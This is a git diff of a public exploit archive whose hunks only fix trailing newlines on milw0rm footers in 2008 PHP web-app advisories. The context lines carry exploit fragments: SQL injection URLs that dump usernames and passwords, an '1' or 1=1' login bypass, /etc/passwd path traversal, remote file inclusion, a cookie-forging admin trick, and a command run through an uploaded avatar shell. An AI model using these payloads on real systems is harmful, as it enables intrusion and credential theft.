milw0rm.com [2008-07-28] +# milw0rm.com [2008-07-28] \ No newline at end of file diff --git a/platforms/php/webapps/6156.txt b/platforms/php/webapps/6156.txt index a3d3f13c2..a23576aed 100755 --- a/platforms/php/webapps/6156.txt +++ b/platforms/php/webapps/6156.txt @@ -65,4 +65,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-07-29] +# milw0rm.com [2008-07-29] \ No newline at end of file diff --git a/platforms/php/webapps/6158.pl b/platforms/php/webapps/6158.pl index ea0f3f00f..6d6a80834 100755 --- a/platforms/php/webapps/6158.pl +++ b/platforms/php/webapps/6158.pl @@ -87,4 +87,4 @@ print qq{ }; } -# milw0rm.com [2008-07-29] +# milw0rm.com [2008-07-29] \ No newline at end of file diff --git a/platforms/php/webapps/6159.txt b/platforms/php/webapps/6159.txt index 88eaeb0ad..f5a0bb3f9 100755 --- a/platforms/php/webapps/6159.txt +++ b/platforms/php/webapps/6159.txt @@ -67,4 +67,4 @@ are encouraged to upgrade as soon as possible. Credits: James Bercegay of the GulfTech Security Research Team -# milw0rm.com [2008-07-29] +# milw0rm.com [2008-07-29] \ No newline at end of file diff --git a/platforms/php/webapps/6160.txt b/platforms/php/webapps/6160.txt index 583a5073c..b576f1465 100755 --- a/platforms/php/webapps/6160.txt +++ b/platforms/php/webapps/6160.txt @@ -11,4 +11,4 @@ # rXh # bEST wISHES -# milw0rm.com [2008-07-29] +# milw0rm.com [2008-07-29] \ No newline at end of file diff --git a/platforms/php/webapps/6161.txt b/platforms/php/webapps/6161.txt index 73e7875d4..9cfef1f7b 100755 --- a/platforms/php/webapps/6161.txt +++ b/platforms/php/webapps/6161.txt @@ -20,4 +20,4 @@ All Members Real Hack & Members Arabs Security And All My Friends , Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) #################################################################################################### -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6162.txt b/platforms/php/webapps/6162.txt index 8044c5d02..733621af3 100755 --- a/platforms/php/webapps/6162.txt +++ b/platforms/php/webapps/6162.txt @@ -21,4 +21,4 @@ All Members Real Hack & Members Arabs Security And All My Friends , Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) #################################################################################################### -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6163.txt b/platforms/php/webapps/6163.txt index 3ba7674f0..cf5e60ce2 100755 --- a/platforms/php/webapps/6163.txt +++ b/platforms/php/webapps/6163.txt @@ -7,4 +7,4 @@ exploit: javascript:document.cookie = "adm=1; path=/"; document.cookie = "adm=1; path=/"; -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6164.txt b/platforms/php/webapps/6164.txt index eb0e3c360..1bc8c6191 100755 --- a/platforms/php/webapps/6164.txt +++ b/platforms/php/webapps/6164.txt @@ -21,4 +21,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6165.txt b/platforms/php/webapps/6165.txt index 6f0f2b96b..5131dc097 100755 --- a/platforms/php/webapps/6165.txt +++ b/platforms/php/webapps/6165.txt @@ -36,4 +36,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6166.php b/platforms/php/webapps/6166.php index 7c03bfc1d..a79bfefa6 100755 --- a/platforms/php/webapps/6166.php +++ b/platforms/php/webapps/6166.php @@ -65,4 +65,4 @@ style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;"> ?> -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6167.txt b/platforms/php/webapps/6167.txt index b532d2bf8..5035319fa 100755 --- a/platforms/php/webapps/6167.txt +++ b/platforms/php/webapps/6167.txt @@ -40,4 +40,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6168.php b/platforms/php/webapps/6168.php index a6989bcc7..3ebfea183 100755 --- a/platforms/php/webapps/6168.php +++ b/platforms/php/webapps/6168.php @@ -65,4 +65,4 @@ style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;"> ?> -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6169.txt b/platforms/php/webapps/6169.txt index f3d400b51..4213fbe35 100755 --- a/platforms/php/webapps/6169.txt +++ b/platforms/php/webapps/6169.txt @@ -61,4 +61,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6170.txt b/platforms/php/webapps/6170.txt index 46056d34f..f3a0f2b99 100755 --- a/platforms/php/webapps/6170.txt +++ b/platforms/php/webapps/6170.txt @@ -52,4 +52,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6171.pl b/platforms/php/webapps/6171.pl index d78786ee3..36e688a9b 100755 --- a/platforms/php/webapps/6171.pl +++ b/platforms/php/webapps/6171.pl @@ -73,4 +73,4 @@ #\----------------------------------------------------------------/ #Vendor Has been contacted and now working for it. -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6172.pl b/platforms/php/webapps/6172.pl index bf030a0d4..59fda7473 100755 --- a/platforms/php/webapps/6172.pl +++ b/platforms/php/webapps/6172.pl @@ -201,4 +201,4 @@ sub usage exit; } -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6173.txt b/platforms/php/webapps/6173.txt index 5f7111f88..2d62b7321 100755 --- a/platforms/php/webapps/6173.txt +++ b/platforms/php/webapps/6173.txt @@ -183,4 +183,4 @@ Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00120-07312008 -# milw0rm.com [2008-07-30] +# milw0rm.com [2008-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/6176.txt b/platforms/php/webapps/6176.txt index 6826beaab..4d70865db 100755 --- a/platforms/php/webapps/6176.txt +++ b/platforms/php/webapps/6176.txt @@ -103,4 +103,4 @@ To do that you can use 'Modify Headers'. ======================================================================= -# milw0rm.com [2008-07-31] +# milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/6177.php b/platforms/php/webapps/6177.php index 4f5ceb20b..3164e2b4f 100755 --- a/platforms/php/webapps/6177.php +++ b/platforms/php/webapps/6177.php @@ -139,4 +139,4 @@ function cmd($host,$path,$port,$cmd) { ?> -# milw0rm.com [2008-07-31] +# milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/6178.php b/platforms/php/webapps/6178.php index be0dc5c40..65be31547 100755 --- a/platforms/php/webapps/6178.php +++ b/platforms/php/webapps/6178.php @@ -249,4 +249,4 @@ while(1) ?> -# milw0rm.com [2008-07-31] +# milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/6179.txt b/platforms/php/webapps/6179.txt index 97b3f44b2..13082643e 100755 --- a/platforms/php/webapps/6179.txt +++ b/platforms/php/webapps/6179.txt @@ -39,4 +39,4 @@ ==================================================================== -# milw0rm.com [2008-07-31] +# milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/6182.txt b/platforms/php/webapps/6182.txt index da4a09d02..7e84f78c5 100755 --- a/platforms/php/webapps/6182.txt +++ b/platforms/php/webapps/6182.txt @@ -55,4 +55,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6183.txt b/platforms/php/webapps/6183.txt index 57460bc10..8e7c1f600 100755 --- a/platforms/php/webapps/6183.txt +++ b/platforms/php/webapps/6183.txt @@ -15,4 +15,4 @@ $abg_path is initilizied but overwritten later down the road. http://www.[site].com/[abg path]/index.php?abg_path=[shell]? -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6184.txt b/platforms/php/webapps/6184.txt index b60d8f348..3a3235bc6 100755 --- a/platforms/php/webapps/6184.txt +++ b/platforms/php/webapps/6184.txt @@ -52,4 +52,4 @@ Author: Corwin Contact: corwin88[dog]mail[dot]ru -------- -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6185.txt b/platforms/php/webapps/6185.txt index db9ef3dfb..86b26d6dc 100755 --- a/platforms/php/webapps/6185.txt +++ b/platforms/php/webapps/6185.txt @@ -34,4 +34,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6186.txt b/platforms/php/webapps/6186.txt index 08c7e55c8..f4fbed507 100755 --- a/platforms/php/webapps/6186.txt +++ b/platforms/php/webapps/6186.txt @@ -34,4 +34,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6187.txt b/platforms/php/webapps/6187.txt index 86e964a66..a95a180b3 100755 --- a/platforms/php/webapps/6187.txt +++ b/platforms/php/webapps/6187.txt @@ -34,4 +34,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6189.txt b/platforms/php/webapps/6189.txt index 181397fab..30d6030b3 100755 --- a/platforms/php/webapps/6189.txt +++ b/platforms/php/webapps/6189.txt @@ -53,4 +53,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6190.txt b/platforms/php/webapps/6190.txt index 86569941b..8325c4238 100755 --- a/platforms/php/webapps/6190.txt +++ b/platforms/php/webapps/6190.txt @@ -18,4 +18,4 @@ Proof of Concept : http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/* http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users -# milw0rm.com [2008-08-01] +# milw0rm.com [2008-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/6191.txt b/platforms/php/webapps/6191.txt index 8b638b383..839bc70c1 100755 --- a/platforms/php/webapps/6191.txt +++ b/platforms/php/webapps/6191.txt @@ -43,4 +43,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-08-02] +# milw0rm.com [2008-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/6192.txt b/platforms/php/webapps/6192.txt index d1178423e..421f59ec9 100755 --- a/platforms/php/webapps/6192.txt +++ b/platforms/php/webapps/6192.txt @@ -48,4 +48,4 @@ Author: Corwin Contact: corwin88[dog]mail[dot]ru -------- -# milw0rm.com [2008-08-02] +# milw0rm.com [2008-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/6193.txt b/platforms/php/webapps/6193.txt index 6940b7e42..0b10b1437 100755 --- a/platforms/php/webapps/6193.txt +++ b/platforms/php/webapps/6193.txt @@ -42,4 +42,4 @@ In admin panel none username only admin password ;D ######################################################################################################### ######################################################################################################### -# milw0rm.com [2008-08-02] +# milw0rm.com [2008-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/6194.pl b/platforms/php/webapps/6194.pl index 6bb230786..17bc425cc 100755 --- a/platforms/php/webapps/6194.pl +++ b/platforms/php/webapps/6194.pl @@ -104,4 +104,4 @@ sub send_surprise() { } } -# milw0rm.com [2008-08-02] +# milw0rm.com [2008-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/6199.pl b/platforms/php/webapps/6199.pl index c0a1b5d52..32a661064 100755 --- a/platforms/php/webapps/6199.pl +++ b/platforms/php/webapps/6199.pl @@ -110,4 +110,4 @@ sub istrue2 } -# milw0rm.com [2008-08-03] +# milw0rm.com [2008-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/6200.txt b/platforms/php/webapps/6200.txt index 354e6ffb5..7a353038d 100755 --- a/platforms/php/webapps/6200.txt +++ b/platforms/php/webapps/6200.txt @@ -14,4 +14,4 @@ This will open autoexec.bat . ########################################### -# milw0rm.com [2008-08-03] +# milw0rm.com [2008-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/6203.txt b/platforms/php/webapps/6203.txt index 5bebfe0f2..aabf4e6c2 100755 --- a/platforms/php/webapps/6203.txt +++ b/platforms/php/webapps/6203.txt @@ -49,4 +49,4 @@ http://site.com/index.php?archive=../../../../../../../etc/passwd%00 -------- young iranian h4ck3rz -# milw0rm.com [2008-08-04] +# milw0rm.com [2008-08-04] \ No newline at end of file diff --git a/platforms/php/webapps/6204.txt b/platforms/php/webapps/6204.txt index a1b597edc..01a48f123 100755 --- a/platforms/php/webapps/6204.txt +++ b/platforms/php/webapps/6204.txt @@ -116,4 +116,4 @@ addresses these issues will be available later in the week. Credits: James Bercegay of the GulfTech Security Research Team -# milw0rm.com [2008-08-05] +# milw0rm.com [2008-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/6205.txt b/platforms/php/webapps/6205.txt index ecdb355d2..c96f03424 100755 --- a/platforms/php/webapps/6205.txt +++ b/platforms/php/webapps/6205.txt @@ -59,4 +59,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-08-05] +# milw0rm.com [2008-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/6206.txt b/platforms/php/webapps/6206.txt index 21ed367d2..1198f305c 100755 --- a/platforms/php/webapps/6206.txt +++ b/platforms/php/webapps/6206.txt @@ -30,4 +30,4 @@ # # ######################################################################### -# milw0rm.com [2008-08-05] +# milw0rm.com [2008-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/6207.txt b/platforms/php/webapps/6207.txt index e4083563e..dd8743974 100755 --- a/platforms/php/webapps/6207.txt +++ b/platforms/php/webapps/6207.txt @@ -9,4 +9,4 @@ C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/* -# milw0rm.com [2008-08-05] +# milw0rm.com [2008-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/6208.txt b/platforms/php/webapps/6208.txt index 274153c94..18e6fd99d 100755 --- a/platforms/php/webapps/6208.txt +++ b/platforms/php/webapps/6208.txt @@ -16,4 +16,4 @@ See the avatar name at your profile. Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al -# milw0rm.com [2008-08-06] +# milw0rm.com [2008-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/6209.rb b/platforms/php/webapps/6209.rb index 14098d92d..f403008a8 100755 --- a/platforms/php/webapps/6209.rb +++ b/platforms/php/webapps/6209.rb @@ -53,4 +53,4 @@ if @host puts " - Visit " + @host end -# milw0rm.com [2008-08-06] +# milw0rm.com [2008-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/6210.rb b/platforms/php/webapps/6210.rb index c7df48382..15021e735 100755 --- a/platforms/php/webapps/6210.rb +++ b/platforms/php/webapps/6210.rb @@ -58,4 +58,4 @@ if @host puts " - Visit " + @host end -# milw0rm.com [2008-08-06] +# milw0rm.com [2008-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/6213.txt b/platforms/php/webapps/6213.txt index 42e589f51..a458bc9d1 100755 --- a/platforms/php/webapps/6213.txt +++ b/platforms/php/webapps/6213.txt @@ -30,4 +30,4 @@ # # ######################################################################### -# milw0rm.com [2008-08-06] +# milw0rm.com [2008-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/6214.php b/platforms/php/webapps/6214.php index c399cda7c..dd83d0f63 100755 --- a/platforms/php/webapps/6214.php +++ b/platforms/php/webapps/6214.php @@ -48,4 +48,4 @@ while (!feof($ock)) { } ?> -# milw0rm.com [2008-08-06] +# milw0rm.com [2008-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/6215.txt b/platforms/php/webapps/6215.txt index ff98a1306..954fafb78 100755 --- a/platforms/php/webapps/6215.txt +++ b/platforms/php/webapps/6215.txt @@ -41,4 +41,4 @@ # Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate. ####################################################### -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6219.txt b/platforms/php/webapps/6219.txt index aa6f154a7..02d3a8131 100755 --- a/platforms/php/webapps/6219.txt +++ b/platforms/php/webapps/6219.txt @@ -72,4 +72,4 @@ Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00122-08072008 -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6223.php b/platforms/php/webapps/6223.php index 8df78f04f..cc5552c5c 100755 --- a/platforms/php/webapps/6223.php +++ b/platforms/php/webapps/6223.php @@ -51,4 +51,4 @@ if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds. echo " " . $tmp[1] . "\n\ndone."; ?> -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6225.txt b/platforms/php/webapps/6225.txt index 5cb0baed4..76515130b 100755 --- a/platforms/php/webapps/6225.txt +++ b/platforms/php/webapps/6225.txt @@ -45,4 +45,4 @@ now visit /admin and you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6226.txt b/platforms/php/webapps/6226.txt index 086ed8df7..fab3f7f5f 100755 --- a/platforms/php/webapps/6226.txt +++ b/platforms/php/webapps/6226.txt @@ -45,4 +45,4 @@ Password :[whatever] --- young iranian h4ck3rz -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6228.txt b/platforms/php/webapps/6228.txt index 56154199b..d78c02b3e 100755 --- a/platforms/php/webapps/6228.txt +++ b/platforms/php/webapps/6228.txt @@ -20,4 +20,4 @@ texteditor and get your password ;). #greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P -# milw0rm.com [2008-08-10] +# milw0rm.com [2008-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/6230.txt b/platforms/php/webapps/6230.txt index 41e8e15e5..c64ca928f 100755 --- a/platforms/php/webapps/6230.txt +++ b/platforms/php/webapps/6230.txt @@ -46,4 +46,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-11] +# milw0rm.com [2008-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/6231.txt b/platforms/php/webapps/6231.txt index 6d7d038ab..9f47e5dd8 100755 --- a/platforms/php/webapps/6231.txt +++ b/platforms/php/webapps/6231.txt @@ -13,4 +13,4 @@ you can upload you php shell in this link after you go here http://localhost/ppim/shell.php -# milw0rm.com [2008-08-11] +# milw0rm.com [2008-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/6232.txt b/platforms/php/webapps/6232.txt index 713987394..e236acea0 100755 --- a/platforms/php/webapps/6232.txt +++ b/platforms/php/webapps/6232.txt @@ -25,4 +25,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-08-11] +# milw0rm.com [2008-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/6233.txt b/platforms/php/webapps/6233.txt index be4b42705..fadf068b6 100755 --- a/platforms/php/webapps/6233.txt +++ b/platforms/php/webapps/6233.txt @@ -17,4 +17,4 @@ # Found by: IP-Sh0k ####################################################### -# milw0rm.com [2008-08-12] +# milw0rm.com [2008-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/6234.txt b/platforms/php/webapps/6234.txt index 6a57cd1fa..b8c94a2a6 100755 --- a/platforms/php/webapps/6234.txt +++ b/platforms/php/webapps/6234.txt @@ -87,4 +87,4 @@ Example : 5. Login admin with new password -# milw0rm.com [2008-08-12] +# milw0rm.com [2008-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/6235.txt b/platforms/php/webapps/6235.txt index e028de1d3..211ccacaa 100755 --- a/platforms/php/webapps/6235.txt +++ b/platforms/php/webapps/6235.txt @@ -23,4 +23,4 @@ _______________________________________________ = JIKI TEAm = =---------------------------------------------= -# milw0rm.com [2008-08-13] +# milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/6247.txt b/platforms/php/webapps/6247.txt index 1ba4eff0a..289c3c0cc 100755 --- a/platforms/php/webapps/6247.txt +++ b/platforms/php/webapps/6247.txt @@ -18,4 +18,4 @@ solution: Script should filter meta characters from user input. +++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2008-08-15] +# milw0rm.com [2008-08-15] \ No newline at end of file diff --git a/platforms/php/webapps/6249.txt b/platforms/php/webapps/6249.txt index f9b27a2b1..9377a1e04 100755 --- a/platforms/php/webapps/6249.txt +++ b/platforms/php/webapps/6249.txt @@ -57,4 +57,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-15] +# milw0rm.com [2008-08-15] \ No newline at end of file diff --git a/platforms/php/webapps/6250.txt b/platforms/php/webapps/6250.txt index d0664c769..e9babc81c 100755 --- a/platforms/php/webapps/6250.txt +++ b/platforms/php/webapps/6250.txt @@ -28,4 +28,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-08-15] +# milw0rm.com [2008-08-15] \ No newline at end of file diff --git a/platforms/php/webapps/6254.txt b/platforms/php/webapps/6254.txt index 0a5675081..c194ccf94 100755 --- a/platforms/php/webapps/6254.txt +++ b/platforms/php/webapps/6254.txt @@ -20,4 +20,4 @@ FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r ################################################################################################################################## -# milw0rm.com [2008-08-17] +# milw0rm.com [2008-08-17] \ No newline at end of file diff --git a/platforms/php/webapps/6255.txt b/platforms/php/webapps/6255.txt index 5fc1552ed..abee2d67d 100755 --- a/platforms/php/webapps/6255.txt +++ b/platforms/php/webapps/6255.txt @@ -56,4 +56,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-17] +# milw0rm.com [2008-08-17] \ No newline at end of file diff --git a/platforms/php/webapps/6258.txt b/platforms/php/webapps/6258.txt index 027eee4d2..376777b2c 100755 --- a/platforms/php/webapps/6258.txt +++ b/platforms/php/webapps/6258.txt @@ -43,4 +43,4 @@ ################################################################ # Vuln Discovered 17/08/2008 -# milw0rm.com [2008-08-17] +# milw0rm.com [2008-08-17] \ No newline at end of file diff --git a/platforms/php/webapps/6259.txt b/platforms/php/webapps/6259.txt index 5744c1c62..86e76585b 100755 --- a/platforms/php/webapps/6259.txt +++ b/platforms/php/webapps/6259.txt @@ -61,4 +61,4 @@ <<->> All muslims -# milw0rm.com [2008-08-18] +# milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/6260.txt b/platforms/php/webapps/6260.txt index ab8061451..061745ff0 100755 --- a/platforms/php/webapps/6260.txt +++ b/platforms/php/webapps/6260.txt @@ -32,4 +32,4 @@ second sql injection (magic quotes gpc must be off): just 4 fun -# milw0rm.com [2008-08-18] +# milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/6261.txt b/platforms/php/webapps/6261.txt index 08b7c8174..44c8bdc4f 100755 --- a/platforms/php/webapps/6261.txt +++ b/platforms/php/webapps/6261.txt @@ -112,4 +112,4 @@ http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62 Credits: James Bercegay of the GulfTech Security Research Team -# milw0rm.com [2008-08-18] +# milw0rm.com [2008-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/6270.txt b/platforms/php/webapps/6270.txt index c927a7950..b12a4f705 100755 --- a/platforms/php/webapps/6270.txt +++ b/platforms/php/webapps/6270.txt @@ -47,4 +47,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-19] +# milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/6271.txt b/platforms/php/webapps/6271.txt index d17aad031..532055aa7 100755 --- a/platforms/php/webapps/6271.txt +++ b/platforms/php/webapps/6271.txt @@ -56,4 +56,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-19] +# milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/6273.txt b/platforms/php/webapps/6273.txt index 74f77b81f..9ff05b52a 100755 --- a/platforms/php/webapps/6273.txt +++ b/platforms/php/webapps/6273.txt @@ -76,4 +76,4 @@ Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00125-08182008 -# milw0rm.com [2008-08-19] +# milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/6276.txt b/platforms/php/webapps/6276.txt index 79f6f481a..57dac69b8 100755 --- a/platforms/php/webapps/6276.txt +++ b/platforms/php/webapps/6276.txt @@ -49,4 +49,4 @@ or www.[target].com/Script/adadmin.php -# milw0rm.com [2008-08-19] +# milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/6277.txt b/platforms/php/webapps/6277.txt index 004642503..48c1ab6f0 100755 --- a/platforms/php/webapps/6277.txt +++ b/platforms/php/webapps/6277.txt @@ -42,4 +42,4 @@ ____________________________( Greetz )____________________________ Im IRAQi -# milw0rm.com [2008-08-19] +# milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/php/webapps/6279.pl b/platforms/php/webapps/6279.pl index 1494beb4a..dd5ae4a34 100755 --- a/platforms/php/webapps/6279.pl +++ b/platforms/php/webapps/6279.pl @@ -110,4 +110,4 @@ sub istrue2 ## ####################### -# milw0rm.com [2008-08-20] +# milw0rm.com [2008-08-20] \ No newline at end of file diff --git a/platforms/php/webapps/6280.txt b/platforms/php/webapps/6280.txt index dfeecc208..7912a32db 100755 --- a/platforms/php/webapps/6280.txt +++ b/platforms/php/webapps/6280.txt @@ -28,4 +28,4 @@ username,password: http://www.xxx.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/* -# milw0rm.com [2008-08-20] +# milw0rm.com [2008-08-20] \ No newline at end of file diff --git a/platforms/php/webapps/6281.pl b/platforms/php/webapps/6281.pl index 57bef5aaa..76141b363 100755 --- a/platforms/php/webapps/6281.pl +++ b/platforms/php/webapps/6281.pl @@ -82,4 +82,4 @@ echo "\nExploiting failed: Not enough arguments?\n"; } ?> -# milw0rm.com [2008-08-20] +# milw0rm.com [2008-08-20] \ No newline at end of file diff --git a/platforms/php/webapps/6284.txt b/platforms/php/webapps/6284.txt index 80bdf1cc8..540569950 100755 --- a/platforms/php/webapps/6284.txt +++ b/platforms/php/webapps/6284.txt @@ -21,4 +21,4 @@ Exploit: print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/* -# milw0rm.com [2008-08-21] +# milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/6285.txt b/platforms/php/webapps/6285.txt index d0d226d93..699e61c93 100755 --- a/platforms/php/webapps/6285.txt +++ b/platforms/php/webapps/6285.txt @@ -58,4 +58,4 @@ $result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST Email Address: 1' or 1=1/* Password: 1' or 1=1/* -# milw0rm.com [2008-08-21] +# milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/6286.txt b/platforms/php/webapps/6286.txt index 5c2859dd3..baa1ecb6e 100755 --- a/platforms/php/webapps/6286.txt +++ b/platforms/php/webapps/6286.txt @@ -29,4 +29,4 @@ and the download will begin ( database.sql ) . ########################################################################### -# milw0rm.com [2008-08-21] +# milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/6287.txt b/platforms/php/webapps/6287.txt index 9b1ca8ce0..2443859c6 100755 --- a/platforms/php/webapps/6287.txt +++ b/platforms/php/webapps/6287.txt @@ -27,4 +27,4 @@ Proof of Concept : Jusf 4 fun -# milw0rm.com [2008-08-21] +# milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/php/webapps/6288.txt b/platforms/php/webapps/6288.txt index f6a069e40..7197155c3 100755 --- a/platforms/php/webapps/6288.txt +++ b/platforms/php/webapps/6288.txt @@ -44,4 +44,4 @@ Example : #################################################################### -# milw0rm.com [2008-08-21] +# 